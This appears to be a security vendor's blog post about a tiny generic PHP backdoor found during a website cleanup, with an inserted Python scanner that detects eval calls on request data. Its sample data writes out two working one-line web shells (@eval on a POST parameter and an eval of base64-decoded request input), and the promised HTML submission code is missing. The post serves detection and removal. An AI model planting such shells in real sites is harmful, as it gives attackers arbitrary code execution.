14 Jun, 2017

Short, Simple and Effective Generic PHP Backdoor Malware

Learn how to detect and remove a generic PHP backdoor malware that can execute any malicious code submitted by attackers.
PHP is a general-purpose server-side scripting language that provides a very rich arsenal for web development. As part of that, PHP offers broad capabilities that also make it easy to write generic shells able to run on almost every website.

In a recent website malware cleanup, we detected a generic shell that occupies only 18 characters. The following is the code of this shell, which is capable of executing any arbitrary malicious content submitted by attackers.
This shell has three major parts:

  • @ - The PHP error control operator, which makes the PHP interpreter ignore any error that occurs in the expression (http://php.net/manual/en/language.operators.errorcontrol.php)
  • eval - Evaluates a string as PHP code, allowing execution of arbitrary PHP code provided as the input string
  • $_POST[yt] - The actual shell payload, submitted by the attacker in the POST parameter yt
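
The following is an added detection example written for this post; it is not code from the original article or from Quttera. It reassembles the 18-character shell from the three parts listed above (@, eval, $_POST[yt]) as a constructed sample, puts it next to a few other constructed PHP files, and scans them for eval-style calls whose argument comes straight from a request superglobal ($_POST, $_GET, $_REQUEST, $_COOKIE), including the common case where the payload is first wrapped in a decoding call. The file names and contents are constructed for the example.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample files (not real site files). The first one is the
# 18-character shell described in the post, rebuilt from its three parts.
SAMPLE_FILES: Dict[str, str] = {
    "wp-content/uploads/cache.php": "<?php @eval($_POST[yt]); ?>",
    "themes/x/footer.php": "<?php eval(base64_decode($_REQUEST['c'])); ?>",
    "includes/helper.php": "<?php\nfunction add($a, $b) { return $a + $b; }\n",
    "legit/template.php": "<?php echo htmlspecialchars($_POST['name']); ?>",
}

# eval( or assert( whose argument is a request superglobal, optionally
# prefixed by the @ error-control operator and optionally passed through
# one or more wrapper calls such as base64_decode(...).
EVAL_OF_REQUEST = re.compile(
    r"(?:@\s*)?(?:eval|assert)\s*\("      # @eval( / eval( / assert(
    r"\s*(?:[A-Za-z_][A-Za-z_0-9]*\s*\(\s*)*"  # zero or more wrapper calls
    r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\[",    # $_POST[ etc.
    re.IGNORECASE,
)


def scan_source(source: str) -> List[Tuple[int, str]]:
    """Return (line number, stripped line) for every suspicious line."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        if EVAL_OF_REQUEST.search(line):
            findings.append((lineno, line.strip()))
    return findings


def scan_files(files: Dict[str, str]) -> Dict[str, List[Tuple[int, str]]]:
    """Scan a mapping of path -> contents; keep only files with findings."""
    results = {}
    for path, source in files.items():
        hits = scan_source(source)
        if hits:
            results[path] = hits
    return results


if __name__ == "__main__":
    for path, hits in scan_files(SAMPLE_FILES).items():
        for lineno, text in hits:
            print(f"{path}:{lineno}: {text}")
```

Two points worth noting when using this on a real site. First, the `yt` inside the brackets is an unquoted bare word, which PHP treats as the string 'yt' while emitting a notice; the leading @ suppresses that notice, so the shell stays quiet even on sites with error display enabled. Second, a regular expression like this only catches the plain form of the backdoor; obfuscated variants (string concatenation, variable functions, encoded source) need a broader review, so treat a clean scan as one signal rather than proof the site is clean.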
The following is an example of the HTML-side code used to submit the shell payload:
Is your website flagged for malware, blocked by the search engines or disabled by the host?
Our experts are here to clean up any malware from your sites and remove false-positives, blacklisting and other kinds of alerts by any security vendor and search engines. Just select appropriate ThreatSign! Anti-Malware plan and get back online.

For other issues and help: Quttera help-desk